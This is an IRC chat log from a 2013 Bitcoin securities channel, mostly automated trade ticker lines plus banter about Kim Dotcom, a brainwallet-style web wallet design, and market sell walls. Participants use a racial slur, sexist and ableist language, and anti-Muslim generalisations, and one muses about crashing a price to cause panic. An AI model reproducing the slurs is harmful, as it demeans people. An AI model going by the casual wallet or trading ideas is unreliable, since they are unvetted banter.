01:30:49 bam. May 23 01:30:50 that's true jbork but BTCGuild did go over a few weeks a go May 23 01:30:59 [BTCTC] [TAT.ASICMINER] 11 @ 0.025999 = 0.286 BTC [+] May 23 01:31:03 not a bad scam, TAT. May 23 01:31:06 deepbit was over 50% for ages May 23 01:31:16 thats not all! May 23 01:31:21 oh keep going please May 23 01:31:22 i love it May 23 01:31:27 after he tanks the stock, from stealing all the money May 23 01:31:30 he uses that money May 23 01:31:34 to buy all the stock back May 23 01:31:37 well of course May 23 01:31:41 and then sells his operation to a casino May 23 01:31:45 bam bam! May 23 01:31:50 pew pew! May 23 01:31:51 [BTCTC] [TAT.ASICMINER] 8 @ 0.026149 = 0.2092 BTC [+] May 23 01:31:55 he is after all, not your ordinary scammer. May 23 01:32:05 screw writing my day trader app.. i'm going to write a freaking btc casino May 23 01:32:15 way better idea, lizard. May 23 01:32:25 a little a/b testing and you're in the home stretch May 23 01:32:35 just remember to not operate out of anywhere that cares about gambling May 23 01:33:30 You can probably safely operate on the moon until Newt Gingrich sends a fleet to colonize. May 23 01:34:00 guys kim dotcom invented 2fa https://twitter.com/KimDotcom/status/337332094562873344 May 23 01:34:05 stop using it plox May 23 01:34:23 2fa supports obesity May 23 01:34:32 patent == invention May 23 01:34:36 this guy May 23 01:35:56 that said, there are a shitload of businesses that mega enables May 23 01:35:57 Hope he doesn't sue for infringement! May 23 01:36:00 [HAVELOCK] [ASICM] 12 @ 0.02575 = 0.309 BTC [-] May 23 01:36:11 mega+btc, I should say. May 23 01:36:38 and it's not just mega. i'm stoked to the bone for encrypted storage and in-browser decryption providers to proliferate. May 23 01:36:44 you guys hear about what happened in england? May 23 01:36:57 terrorists May 23 01:37:12 every time someoen dies on earth from now on, it was terrorists May 23 01:37:21 totally. May 23 01:37:26 kitten stuck in tree, terrorists May 23 01:37:43 kid caught masturbating by mom, terrorist plot May 23 01:38:23 americans too fat, terrorists May 23 01:38:57 [BTCTC] [BASIC-MINING] 2 @ 0.54 = 1.08 BTC [+] May 23 01:39:00 [HAVELOCK] [ASICM] 2 @ 0.02599999 = 0.052 BTC [+] May 23 01:39:01 [HAVELOCK] [ASICM] 98 @ 0.026 = 2.548 BTC [+] May 23 01:39:03 [MPEX] [S.MPOE] 8250 @ 0.00067979 = 5.6083 BTC [+] May 23 01:39:04 [MPEX] [S.MPOE] 17900 @ 0.00068019 = 12.1754 BTC [+] May 23 01:39:04 Obama can't pass gun control... terrorists May 23 01:39:12 ... May 23 01:39:19 who is obama? May 23 01:40:00 [HAVELOCK] [ASICM] 1 @ 0.02599999 BTC [-] May 23 01:40:00 I'm pretty sure he's a terrorist May 23 01:40:09 i can't believe people still care about the fat german kid. May 23 01:40:15 wtf, what's next, alanis morisette ? May 23 01:40:21 nah dogs, that's just islam. May 23 01:40:40 although i'm pleased to see london categorizing islam as terrorism. May 23 01:41:21 could have done the same to Christianity during the crusades May 23 01:41:45 how about: irrational thinking leads to lunacy? May 23 01:41:59 Well it seems accurate. Political motive behind it removing our governments from his country or whatever May 23 01:41:59 mircea_popescu: where do you get your material from May 23 01:42:20 tautological, aknap3 May 23 01:42:36 fiat500 what you mean ? May 23 01:42:37 topologically identical to "idiots are idiots" May 23 01:42:37 benkay: was trying to be kind, screwed up May 23 01:43:00 more like religious nutjobs are dangerous... May 23 01:44:55 https://www.youtube.com/watch?v=97XF8ucPQVY May 23 01:45:02 mircea_popescu: you're pretty funny May 23 01:45:07 is gd May 23 01:46:01 [HAVELOCK] [ASICM] 1 @ 0.02599999 BTC [-] May 23 01:50:52 dotcom makes better music than alanis May 23 01:51:58 [BTCTC] [TAT.ASICMINER] 3 @ 0.0255 = 0.0765 BTC [-] May 23 01:51:59 [BTCTC] [TAT.ASICMINER] 1 @ 0.0254 BTC [-] May 23 01:52:01 [BTCTC] [TAT.ASICMINER] 14 @ 0.025005 = 0.3501 BTC [-] May 23 01:52:58 [BTCTC] [TAT.ASICMINER] 1 @ 0.025005 BTC [-] May 23 01:53:08 [BTCTC] [ASICMINER-PT] 1 @ 2.596 BTC [+] May 23 01:53:08 [BTCTC] [ASICMINER-PT] 2 @ 2.597 = 5.194 BTC [+] May 23 01:54:00 [HAVELOCK] [ASICM] 150 @ 0.02599999 = 3.9 BTC [-] May 23 01:55:00 [HAVELOCK] [ASICM] 12 @ 0.02599999 = 0.312 BTC [-] May 23 01:55:02 mircea_popescu, the german is uninteresting, it's the easily-accessible encrypted storage that's interesting. May 23 01:55:15 not what he's delivering May 23 01:55:36 talking about 2fa? May 23 01:56:24 [BTCTC] [ASICMINER-PT] 1 @ 2.596 BTC [-] May 23 01:56:26 [BTCTC] [ASICMINER-PT] 1 @ 2.597 BTC [+] May 23 01:56:43 lol alright truffles or should I call you Loki May 23 01:56:52 let's make sure we;re on the same page here. May 23 01:57:23 some german fatass with a prior for insider trading made a pirating site and raked in big via publicity. May 23 01:57:52 he proceeded to change his name to retard-dood, buy whatever cars etc. May 23 01:58:08 meanwhile his contribution to anything was nil. May 23 01:58:10 [BTCTC] [ASICMINER-PT] 1 @ 2.54 BTC [-] May 23 01:58:23 after getting out of that mess he came out with something he claimed is encryption May 23 01:58:31 man May 23 01:58:38 except it was so full of holes it quickly became the laughingstock of the interwebs May 23 01:58:40 mircea_popescu has sure bought the propaganda May 23 01:58:41 we are here. May 23 01:59:00 [HAVELOCK] [ASICM] 1 @ 0.0259 BTC [-] May 23 01:59:09 dub which part is problematic you say ? May 23 01:59:32 most of it May 23 01:59:42 [BTCTC] [ASICMINER-PT] 1 @ 2.507 BTC [-] May 23 01:59:47 [BTCTC] [TAT.ASICMINER] 7 @ 0.0251 = 0.1757 BTC [+] May 23 01:59:49 [BTCTC] [TAT.ASICMINER] 15 @ 0.025005 = 0.3751 BTC [-] May 23 01:59:50 [BTCTC] [TAT.ASICMINER] 7 @ 0.025 = 0.175 BTC [-] May 23 01:59:56 he took some silly pictures with girls and cars May 23 02:00:07 thats about what he's dont wrong May 23 02:00:14 done* May 23 02:00:23 [BTCTC] [TAT.ASICMINER] 8 @ 0.025 = 0.2 BTC [-] May 23 02:00:30 [BTCTC] [ASICMINER-PT] 2 @ 2.505 = 5.01 BTC [-] May 23 02:00:48 There is a difference between leadership and being ruled. One is voluntary.. the other not so much. May 23 02:00:48 oh it's not terribly hole-y. just, you know, written by idiots. May 23 02:00:49 ... May 23 02:00:56 benkay rly. May 23 02:01:10 basically, he's a media whore. i have very little time for that. May 23 02:01:13 someone, some day, will get it right. May 23 02:01:21 [BTCTC] [PAJKA.BOND] 2 @ 0.108986 = 0.218 BTC [-] May 23 02:01:22 implementation details aside guys May 23 02:01:22 [BTCTC] [TAT.ASICMINER] 5 @ 0.025 = 0.125 BTC [-] May 23 02:01:23 [BTCTC] [ASICMINER-PT] 1 @ 2.5022 BTC [-] May 23 02:01:28 [BTCTC] [TAT.ASICMINER] 25 @ 0.025 = 0.625 BTC [-] May 23 02:01:32 still very interested in browser decryption May 23 02:01:38 he was made into a media whore by holywood May 23 02:01:59 they decided he was an easy mark out of all the people running the same service May 23 02:02:10 and made him famous, he just happens to like it May 23 02:02:24 [BTCTC] [TAT.ASICMINER] 1 @ 0.0261 BTC [+] May 23 02:02:43 [BTCTC] [TAT.ASICMINER] 41 @ 0.02492 = 1.0217 BTC [-] May 23 02:03:01 [HAVELOCK] [ASICM] 3 @ 0.0259 = 0.0777 BTC [-] May 23 02:03:25 i don't see ghow this disproves the "his contribution is nil" part. May 23 02:03:59 just another hick from wherever momentarily being used for whatever "reality show". May 23 02:04:02 [BTCTC] [ASICMINER-PT] 1 @ 2.599 BTC [+] May 23 02:04:09 but who cares about the humans May 23 02:04:15 me. May 23 02:04:29 when vastly smarter people are now noodling on how to do in-browser decryption. May 23 02:05:16 [BTCTC] [TAT.ASICMINER] 5 @ 0.0261 = 0.1305 BTC [+] May 23 02:06:57 which is cool and awesome and enables all sorts of copyright-circumventing business models in conjunction with btc. arguing about the german is a little?forest for the trees. May 23 02:06:59 [HAVELOCK] [ASICM] 386 @ 0.0259 = 9.9974 BTC [-] May 23 02:07:34 who cares about this character satoshi? cryptocurrency implementations are vastly more interesting and profitable. May 23 02:07:38 nahmean? May 23 02:07:59 benkay that was my original point. i dunno why anyone still even mentions the dood May 23 02:08:14 [BTCTC] [TAT.ASICMINER] 1 @ 0.0261 BTC [+] May 23 02:08:39 heh. May 23 02:08:40 except it's more usagi than satoshi May 23 02:11:55 kaiser hitler May 23 02:12:23 truffles: they are talking about kimdotcom May 23 02:12:42 king of internet May 23 02:12:44 no May 23 02:12:52 [BTCTC] [TAT.ASICMINER] 10 @ 0.02589 = 0.2589 BTC [-] May 23 02:12:55 woe is truffles May 23 02:14:44 [BTCTC] [TAT.ASICMINER] 23 @ 0.0261 = 0.6003 BTC [+] May 23 02:22:57 [BTCTC] [COG.F] 3 @ 2.5 = 7.5 BTC [+] May 23 02:25:20 [BTCTC] [TAT.ASICMINER] 30 @ 0.026 = 0.78 BTC [-] May 23 02:26:57 [BTCTC] [GSDPT] 125 @ 0.00285 = 0.3563 BTC [+] May 23 02:27:19 [BTCTC] [TAT.ASICMINER] 1 @ 0.0261 BTC [+] May 23 02:27:47 [BTCTC] [ASICMINER-PT] 1 @ 2.59 BTC [-] May 23 02:28:00 [HAVELOCK] [ASICM] 20 @ 0.0259 = 0.518 BTC [-] May 23 02:28:01 [HAVELOCK] [ASICM] 2 @ 0.0259 = 0.0518 BTC [-] May 23 02:29:00 [HAVELOCK] [ASICM] 2 @ 0.0259 = 0.0518 BTC [-] May 23 02:29:30 [BTCTC] [TAT.ASICMINER] 1 @ 0.0261 BTC [+] May 23 02:33:27 [BTCTC] [ASICMINER-PT] 1 @ 2.59 BTC [-] May 23 02:35:00 [HAVELOCK] [ASICM] 200 @ 0.0258 = 5.16 BTC [-] May 23 02:35:27 [BTCTC] [ASICMINER-PT] 2 @ 2.59 = 5.18 BTC [-] May 23 02:37:00 [HAVELOCK] [ASICM] 15 @ 0.0258 = 0.387 BTC [-] May 23 02:37:37 [BTCTC] [TAT.ASICMINER] 2 @ 0.0261 = 0.0522 BTC [+] May 23 02:38:00 [HAVELOCK] [ASICM] 38 @ 0.0258 = 0.9804 BTC [-] May 23 02:39:37 [BTCTC] [ASICMINER-PT] 1 @ 2.59 BTC [-] May 23 02:40:00 [HAVELOCK] [ASICM] 20 @ 0.0258 = 0.516 BTC [-] May 23 02:40:02 [HAVELOCK] [ASICM] 227 @ 0.0258 = 5.8566 BTC [-] May 23 02:40:03 [HAVELOCK] [ASICM] 1 @ 0.0258 BTC [-] May 23 02:41:00 [HAVELOCK] [ASICM] 19 @ 0.0258 = 0.4902 BTC [-] May 23 02:41:01 [HAVELOCK] [ASICM] 281 @ 0.0259 = 7.2779 BTC [+] May 23 02:42:46 [BTCTC] [ASICMINER-PT] 1 @ 2.594 BTC [+] May 23 02:43:38 [BTCTC] [ASICMINER-PT] 1 @ 2.59 BTC [-] May 23 02:44:00 [HAVELOCK] [ASICM] 26 @ 0.0259 = 0.6734 BTC [+] May 23 02:44:40 heh May 23 02:44:50 we just logged an inbound DDoS from cloudflare May 23 02:45:38 [BTCTC] [ASICMINER-PT] 2 @ 2.594 = 5.188 BTC [+] May 23 02:46:00 [BTCTC] [ASICMINER-PT] 4 @ 2.59 = 10.36 BTC [-] May 23 02:46:05 neat May 23 02:46:24 dub: ddos or people checking for their fucking AM-PT divs? :P May 23 02:46:24 [BTCTC] [TAT.ASICMINER] 20 @ 0.0258 = 0.516 BTC [-] May 23 02:47:33 [BTCTC] [BITVPS] 77 @ 0.000799 = 0.0615 BTC [+] May 23 02:48:00 looks like a web appliance trying to initiate a dns reflection May 23 02:48:31 urgh May 23 02:49:14 [BTCTC] [TAT.ASICMINER] 7 @ 0.0261 = 0.1827 BTC [+] May 23 02:52:17 [BTCTC] [S.DICE-PT] 1 @ 0.002661 BTC [-] May 23 02:54:21 [BTCTC] [S.DICE-PT] 200 @ 0.002661 = 0.5322 BTC [-] May 23 02:56:48 [BTCTC] [TAT.ASICMINER] 7 @ 0.0255 = 0.1785 BTC [-] May 23 02:59:40 [BTCTC] [RSM] 170 @ 0.007 = 1.19 BTC [-] May 23 03:02:00 [HAVELOCK] [ASICM] 2 @ 0.02560001 = 0.0512 BTC [-] May 23 03:02:02 [HAVELOCK] [ASICM] 477 @ 0.0256 = 12.2112 BTC [-] May 23 03:04:00 [HAVELOCK] [ASICM] 45 @ 0.02589 = 1.1651 BTC [+] May 23 03:06:00 [HAVELOCK] [ASICM] 40 @ 0.02589 = 1.0356 BTC [+] May 23 03:07:01 [HAVELOCK] [ASICM] 123 @ 0.0256 = 3.1488 BTC [-] May 23 03:07:03 [HAVELOCK] [ASICM] 28 @ 0.02555 = 0.7154 BTC [-] May 23 03:08:59 [HAVELOCK] [ASICM] 50 @ 0.0258 = 1.29 BTC [+] May 23 03:13:59 [HAVELOCK] [ASICM] 10 @ 0.0258 = 0.258 BTC [+] May 23 03:18:02 [BTCTC] [ASICMINER-PT] 1 @ 2.588 BTC [-] May 23 03:20:32 [BTCTC] [ASICMINER-PT] 3 @ 2.589 = 7.767 BTC [+] May 23 03:21:37 [BTCTC] [TAT.ASICMINER] 12 @ 0.02599 = 0.3119 BTC [+] May 23 03:22:00 [HAVELOCK] [ASICM] 1 @ 0.02561 BTC [-] May 23 03:22:01 !seen bowjob May 23 03:22:58 ;;seen bowjob May 23 03:22:58 bowjob was last seen in #bitcoin-assets 4 weeks, 2 days, 1 hour, 16 minutes, and 13 seconds ago: lol May 23 03:23:04 [BTCTC] [BITVPS] 1 @ 0.000852 BTC [+] May 23 03:23:22 wheres he gone to? May 23 03:24:43 same place as smickles? May 23 03:24:53 [BTCTC] [ASICMINER-PT] 2 @ 2.589 = 5.178 BTC [+] May 23 03:24:57 bitcoin heaven? May 23 03:24:58 i dunno. May 23 03:25:00 ;;seen mircea_popescu May 23 03:25:01 mircea_popescu was last seen in #bitcoin-assets 1 hour, 16 minutes, and 20 seconds ago: except it's more usagi than satoshi May 23 03:25:26 usagi...that nigga still owe me five dollars!!!! May 23 03:26:00 [HAVELOCK] [ASICM] 1 @ 0.02579 BTC [+] May 23 03:26:02 [HAVELOCK] [ASICM] 1 @ 0.02579 BTC [+] May 23 03:26:40 [MPEX] [S.DICE] 1000 @ 0.002021 = 2.021 BTC [+] May 23 03:26:42 [MPEX] [S.DICE] 84000 @ 0.00202 = 169.68 BTC [-] May 23 03:28:13 [BTCTC] [BITVPS] 10 @ 0.000852 = 0.0085 BTC [+] May 23 03:28:47 [BTCTC] [TAT.ASICMINER] 1 @ 0.0255 BTC [-] May 23 03:29:01 [HAVELOCK] [ASICM] 2 @ 0.02579 = 0.0516 BTC [+] May 23 03:29:15 [BTCTC] [TAT.ASICMINER] 2 @ 0.0255 = 0.051 BTC [-] May 23 03:30:59 [HAVELOCK] [ASICM] 300 @ 0.02579 = 7.737 BTC [+] May 23 03:32:59 Someone put up a 499 sell-wall on BTCT AM at ฿2.6. Selling that off at market would bring AM down to 0.002 but still net the seller ฿2+/share >:-) May 23 03:33:00 [HAVELOCK] [ASICM] 2 @ 0.02579 = 0.0516 BTC [+] May 23 03:33:26 Would be fun to cause some panic :-) May 23 03:36:27 [BTCTC] [TAT.ASICMINER] 1 @ 0.0255 BTC [-] May 23 03:43:48 [BTCTC] [GSDPT] 7 @ 0.00285 = 0.02 BTC [+] **** BEGIN LOGGING AT Thu May 23 12:38:26 2013 May 23 12:42:33 hi mircea_popescu May 23 12:42:39 hey May 23 12:42:43 whats new May 23 12:42:50 i caught up on some trilema posts May 23 12:42:52 very nice May 23 12:43:25 ahah cool May 23 12:43:41 Morning. May 23 12:44:42 that storm that snowed up italy past few days moved here May 23 12:44:46 it's friggin cold May 23 12:45:07 So you invest in mining equipment and save a ton on electricity. Stop being so negative :-) May 23 12:49:19 i invested in this ballerina and i'm completely exhausted May 23 12:49:22 which makes the cold worse May 23 12:49:56 [BTCTC] [BASIC-MINING] 1 @ 0.530001 BTC [-] May 23 12:55:44 [BTCTC] [TAT.ASICMINER] 2 @ 0.024999 = 0.05 BTC [-] May 23 12:57:31 [BTCTC] [S.DICE-PT] 65 @ 0.002405 = 0.1563 BTC [-] May 23 12:57:33 [BTCTC] [S.DICE-PT] 20 @ 0.002404 = 0.0481 BTC [-] May 23 12:57:49 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [-] May 23 12:58:21 [BTCTC] [S.DICE-PT] 1 @ 0.00239 BTC [-] May 23 12:59:38 [MPEX] [S.MPOE] 22800 @ 0.00070442 = 16.0608 BTC [-] May 23 13:02:15 [BTCTC] [COGNITIVE] 10 @ 0.25 = 2.5 BTC [+] May 23 13:03:02 [HAVELOCK] [ASICM] 36 @ 0.025 = 0.9 BTC [+] May 23 13:05:53 Pictures or it didn't happen. May 23 13:05:54 [BTCTC] [PAJKA.BOND] 1 @ 0.1079 BTC [+] May 23 13:06:03 [HAVELOCK] [ASICM] 12 @ 0.025 = 0.3 BTC [+] May 23 13:06:31 [BTCTC] [TAT.ASICMINER] 2 @ 0.0246 = 0.0492 BTC [-] May 23 13:06:33 [BTCTC] [TAT.ASICMINER] 106 @ 0.02451 = 2.5981 BTC [-] May 23 13:07:20 [BTCTC] [TAT.ASICMINER] 2 @ 0.02451 = 0.049 BTC [-] May 23 13:07:26 hey davout May 23 13:07:37 mjr_: hey May 23 13:07:44 [BTCTC] [TAT.ASICMINER] 1 @ 0.0248 BTC [+] May 23 13:09:02 i miss instawallet May 23 13:09:20 mjr_: do you? May 23 13:09:28 yes May 23 13:09:32 yes, he keeps having as many coins in the morning as when he went to bed May 23 13:09:34 so boring May 23 13:09:38 lol May 23 13:09:40 lol May 23 13:09:41 hahaha May 23 13:09:45 i miss the service May 23 13:09:51 for short term walleting May 23 13:10:02 i want to relaunch it, but i have no interest in holding the coins May 23 13:10:13 it woudln't be a bad service, if someone were to make it in ON A SANE PLATFORM May 23 13:10:37 mircea_popescu: maybe you mean a framework ? May 23 13:10:43 w/e May 23 13:11:02 i was thinking of sthg where the private key, and address are derived from the URL May 23 13:11:09 yes. May 23 13:11:25 the problem is that even like this you have to trust the operator to not log requests May 23 13:11:42 why not use asymetric keys ? May 23 13:11:42 so i guess it'd have to be combined with a password May 23 13:11:58 how would that work ? May 23 13:12:17 it would work thusly : user generates a seed. from it user calculates a private key which he keeps and a public key May 23 13:12:22 he goes to yoursite.com/publickey May 23 13:12:28 you show him the btc addy, he sends there. May 23 13:12:41 the only time you need to see the privkey is when he wants the btc sent. May 23 13:12:47 that requires the extra separate step of generating the key May 23 13:12:50 yes. May 23 13:12:53 i was thinking differently May 23 13:13:00 but it also gives user complete immunity from anything you might misdo May 23 13:13:08 as you never have the keys and so can safely run bitcoind May 23 13:13:13 cause it can't send anything anyway May 23 13:13:26 that's the idea, my implementation differs though May 23 13:13:35 and the key generator might as well be a js the user downloads and runs locally. May 23 13:13:38 in my implementation you still have a secret URL May 23 13:13:41 what were you thinking ? May 23 13:13:57 when you visit the URL you get prompted for a password May 23 13:14:11 SHA256(URL+password) is the private key May 23 13:14:24 sort of 1.5fa May 23 13:14:25 address gets derived from the private key May 23 13:14:49 not quite, your money *is* the password May 23 13:14:59 [BTCTC] [TAT.ASICMINER] 7 @ 0.02479 = 0.1735 BTC [-] May 23 13:15:29 and we never touch it, we can't spend it, we can serve it as a static HTML page, plugs itself into blockchain.info for all bitcoin related needs May 23 13:15:46 so blockchain.info gets the server load May 23 13:15:47 good idea May 23 13:15:55 and we get the advertising revenue or w/e May 23 13:16:24 also since the revenue is generated in BTC we can IPO if our business model makes sense May 23 13:16:51 i don't think that revenue would be very large. May 23 13:17:02 [HAVELOCK] [ASICM] 9 @ 0.025 = 0.225 BTC [+] May 23 13:17:16 me neither, but you never know, especially if you plug into a SD clone May 23 13:17:48 [BTCTC] [BITVPS] 9 @ 0.000856 = 0.0077 BTC [+] May 23 13:18:00 davout: I'd do a cookie stored uid, then you can enter that into a POST to access your wallet if you have deleted it May 23 13:18:13 no accounts or passwords or anything, just a unique id May 23 13:18:28 if it's provably as secure as blockchain.info and easier to use it would get loads of traffic, just layer some easy service to buy coins on top and i think you can make decent money May 23 13:19:02 well... untiul blockchain info decides they want most of it. May 23 13:19:40 until b.i blocks it via CORS rules May 23 13:19:52 [BTCTC] [TAT.ASICMINER] 24 @ 0.0245 = 0.588 BTC [-] May 23 13:19:53 mircea_popescu: well, at that point i'll make use of the blockchain.io domain i bought a while ago and have it run a patched instance of bitcoind, or bitcoin-ruby for the same purpose May 23 13:20:29 right-o. May 23 13:20:38 [BTCTC] [TAT.ASICMINER] 1 @ 0.0247 BTC [+] May 23 13:20:45 but I guess you'll have an agreement with piuk if you do that May 23 13:20:50 so basically a b i clone pushing a s.d clone will make a lot of moneyh May 23 13:20:52 because bitcoin May 23 13:21:03 [BTCTC] [RSM] 1 @ 0.00978 BTC [+] May 23 13:21:06 naaah, don't make me say what i did not say May 23 13:21:11 [BTCTC] [RSM] 42 @ 0.009789 = 0.4111 BTC [+] May 23 13:21:13 [BTCTC] [GSDPT] 2 @ 0.00285 = 0.0057 BTC [+] May 23 13:21:17 just saying, this design is strategically weak May 23 13:22:06 kakobrekla "Due to the lack of volume and the need to restructure our screen layout we have decided to remove all trading pairs that do not include BTC." May 23 13:22:14 totally lol. https://bitcointalk.org/index.php?topic=213302.0 May 23 13:22:36 i'm saying, if it's secure, and easy, it'll get traffic, if you have traffic you can monetize it, the best way, IMO, to monetize traffic from noobs is to sell them coins May 23 13:22:52 o, is that last true ? May 23 13:22:57 [BTCTC] [ASICMINER-PT] 2 @ 2.5 = 5 BTC [-] May 23 13:23:07 well, we had this instawire thing going on for a while May 23 13:23:11 til. May 23 13:23:27 where people would input a BTC address in the comments field of a bank wire May 23 13:23:39 worked awesome, and people were willing to pay a nice premium May 23 13:23:45 problem with that is VAT May 23 13:24:14 but even with VAT people were willing to pay May 23 13:24:32 [BTCTC] [BASIC-MINING] 1 @ 0.549999 BTC [+] May 23 13:24:41 i guess you've found mtgox' business model. May 23 13:24:44 with a 10 EUR/BTC rate people were willing to pay 10 EUR + 1,96 EUR + our premium May 23 13:24:48 except they leeched the us market, no vat May 23 13:24:53 yup May 23 13:25:37 [BTCTC] [TAT.ASICMINER] 58 @ 0.0246 = 1.4268 BTC [-] May 23 13:26:28 [BTCTC] [TAT.ASICMINER] 31 @ 0.0247 = 0.7657 BTC [+] May 23 13:26:29 oh, btw, for people who are vim fanboys you can now donate to moolenaar May 23 13:28:14 [BTCTC] [TAT.ASICMINER] 1 @ 0.02479 BTC [+] May 23 13:38:52 with buttcoin? May 23 13:41:31 [BTCTC] [TAT.ASICMINER] 2 @ 0.02478 = 0.0496 BTC [-] May 23 13:41:33 https://images.4chan.org/fit/src/1369303578780.jpg May 23 13:41:44 society summed up May 23 13:42:17 not society. i am society. May 23 13:42:29 these are some random douches. May 23 13:43:02 [HAVELOCK] [ASICM] 82 @ 0.025 = 2.05 BTC [+] May 23 13:45:02 [HAVELOCK] [ASICM] 82 @ 0.0251 = 2.0582 BTC [+] May 23 13:45:58 [BTCTC] [BASIC-MINING] 1 @ 0.55 BTC [+] May 23 13:46:00 you're a romanian gigolo May 23 13:46:02 [HAVELOCK] [ASICM] 24 @ 0.02512 = 0.6029 BTC [+] May 23 13:46:14 ha! May 23 13:46:27 no, io May 23 13:46:32 i'm, just a bitch trainer. May 23 13:46:41 i set teh standards for female behaviour. May 23 13:47:02 [HAVELOCK] [ASICM] 558 @ 0.02512 = 14.017 BTC [+] May 23 13:49:02 [HAVELOCK] [ASICM] 1 @ 0.02512 BTC [+] May 23 13:49:16 The 499 sell wall on BTCT AM just moved down from ฿2.6 to ฿2.5. Someone is getting restless... May 23 13:51:32 [BTCTC] [TAT.ASICMINER] 4 @ 0.02478 = 0.0991 BTC [-] May 23 13:51:49 [BTCTC] [ASICMINER-PT] 1 @ 2.4999 BTC [-] May 23 13:51:52 [BTCTC] [TAT.ASICMINER] 3 @ 0.02479 = 0.0744 BTC [+] May 23 13:52:26 mebbe so May 23 13:52:28 yeah people getting over it May 23 13:52:41 [BTCTC] [TAT.ASICMINER] 47 @ 0.02479 = 1.1651 BTC [+] May 23 13:54:12 wonder what Chaang-Noi & the merry pumpers will be inflating next. May 23 13:56:23 [BTCTC] [TAT.ASICMINER] 3 @ 0.02451 = 0.0735 BTC [-] May 23 13:57:32 [BTCTC] [TAT.ASICMINER] 2 @ 0.02451 = 0.049 BTC [-] May 23 13:57:33 [BTCTC] [ASICMINER-PT] 1 @ 2.4999 BTC [-] May 23 13:58:20 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [+] May 23 14:00:18 [MPEX] [S.MPOE] 9700 @ 0.00070455 = 6.8341 BTC [+] May 23 14:02:23 [BTCTC] [ASICMINER-PT] 1 @ 2.470101 BTC [-] May 23 14:02:27 [BTCTC] [ASICMINER-PT] 1 @ 2.47 BTC [-] May 23 14:02:32 [BTCTC] [ASICMINER-PT] 1 @ 2.45 BTC [-] May 23 14:04:02 [HAVELOCK] [ASICM] 50 @ 0.02512 = 1.256 BTC [+] May 23 14:05:41 [BTCTC] [TAT.ASICMINER] 2 @ 0.02479 = 0.0496 BTC [+] May 23 14:14:17 ugh i am so sick of businesses that do things without purpose May 23 14:14:43 or rather, of businesses which fail to lead in a goal-oriented way May 23 14:15:01 which results in employees doing things that don't make sense because they have no clue what they are doing May 23 14:18:33 [MPEX] [S.DICE] 200 @ 0.00237435 = 0.4749 BTC [-] May 23 14:20:04 whats up mjr *highfive* May 23 14:21:27 in other words, shitty managers.. May 23 14:22:46 mircea popescu: what software is used to plot the graphs displayed on mpex/mpoe May 23 14:24:24 [BTCTC] [BITVPS] 1 @ 0.0008 BTC [-] May 23 14:24:29 [BTCTC] [TAT.ASICMINER] 8 @ 0.02479 = 0.1983 BTC [+] May 23 14:26:19 KRS-1: yep basically May 23 14:26:44 its the same thing as dictatorships vs free market May 23 14:26:55 they can do exactly what you tell them to do May 23 14:27:18 but that is a way worse system than just putting incentives in place so they do what you want, they will find the best way May 23 14:29:06 if its one thing i've noticed since i've entered the job market in the late 80's til now is that management has gotten shitty..and they won't think twice about making their shit roll downhill onto the employees. i've seen good people lose their jobs over shitty managers who throw them under the bus. May 23 14:29:18 yeah May 23 14:29:24 Or entire teams get dismissed because performance or expectations haven't been met by poor leadership. May 23 14:29:28 i just mean, the end goal is to produce something, to do something May 23 14:29:46 that is a reason why a lot of bitcoin businesses fail, is due to poor management May 23 14:29:52 company restructures and puts investment into other projects so they're no longer needed..all under the umbrella of "employment at will" May 23 14:30:23 [BTCTC] [ASICMINER-PT] 1 @ 2.499993 BTC [+] May 23 14:32:39 The Best Bitcoin Scam of 2013 https://bitcointalk.org/index.php?topic=80312.msg2244347#msg2244347 May 23 14:33:12 [MPEX] [S.MPOE] 13242 @ 0.00070209 = 9.2971 BTC [-] May 23 14:34:59 japanese economic storm brewing May 23 14:35:07 bitcoin save us May 23 14:46:26 [BTCTC] [S.DICE-PT] 4 @ 0.0024 = 0.0096 BTC [+] May 23 14:49:26 [BTCTC] [PAJKA.BOND] 7 @ 0.107 = 0.749 BTC [-] May 23 14:49:28 [BTCTC] [PAJKA.BOND] 10 @ 0.107 = 1.07 BTC [-] May 23 14:51:09 [BTCTC] [S.DICE-PT] 4 @ 0.002303 = 0.0092 BTC [-] May 23 14:51:11 [BTCTC] [S.DICE-PT] 100 @ 0.002302 = 0.2302 BTC [-] May 23 14:51:12 [BTCTC] [S.DICE-PT] 100 @ 0.002301 = 0.2301 BTC [-] May 23 14:51:25 [BTCTC] [S.DICE-PT] 1159 @ 0.0023 = 2.6657 BTC [-] May 23 14:51:28 [BTCTC] [TAT.ASICMINER] 8 @ 0.02479 = 0.1983 BTC [+] May 23 14:52:25 [BTCTC] [TAT.ASICMINER] 11 @ 0.0248 = 0.2728 BTC [+] May 23 14:53:45 [BTCTC] [S.DICE-PT] 5 @ 0.002709 = 0.0135 BTC [+] May 23 14:53:48 [MPEX] [S.MPOE] 8100 @ 0.00070454 = 5.7068 BTC [+] May 23 14:54:09 [BTCTC] [BITVPS] 100 @ 0.000852 = 0.0852 BTC [+] May 23 14:56:04 [BTCTC] [TAT.ASICMINER] 5 @ 0.0248 = 0.124 BTC [+] May 23 14:57:45 [BTCTC] [S.MPOE-PT] 1 @ 0.000699 BTC [+] May 23 15:00:00 [BTCTC] [TAT.ASICMINER] 5 @ 0.02465 = 0.1233 BTC [-] May 23 15:01:03 [BTCTC] [BASIC-MINING] 13 @ 0.55 = 7.15 BTC [+] May 23 15:02:38 [BTCTC] [TAT.ASICMINER] 6 @ 0.0248 = 0.1488 BTC [+] May 23 15:04:02 [HAVELOCK] [ASICM] 3 @ 0.025 = 0.075 BTC [-] May 23 15:04:23 [BTCTC] [TAT.ASICMINER] 50 @ 0.024636 = 1.2318 BTC [-] May 23 15:04:56 [BTCTC] [TAT.ASICMINER] 5 @ 0.024999 = 0.125 BTC [+] May 23 15:06:01 [BTCTC] [TAT.ASICMINER] 2 @ 0.024635 = 0.0493 BTC [-] May 23 15:06:02 [HAVELOCK] [HIM] 16 @ 2.1701 = 34.7216 BTC [-] May 23 15:08:15 [MPEX] [S.MPOE] 2558 @ 0.00070209 = 1.7959 BTC [-] May 23 15:08:18 [MPEX] [S.MPOE] 15449 @ 0.00069864 = 10.7933 BTC [-] May 23 15:08:47 [BTCTC] [TAT.ASICMINER] 2 @ 0.024999 = 0.05 BTC [+] May 23 15:09:55 [BTCTC] [BITVPS] 100 @ 0.0007 = 0.07 BTC [-] May 23 15:09:57 [BTCTC] [BITVPS] 1 @ 0.00068 BTC [-] May 23 15:10:11 [BTCTC] [BITVPS] 50 @ 0.000655 = 0.0328 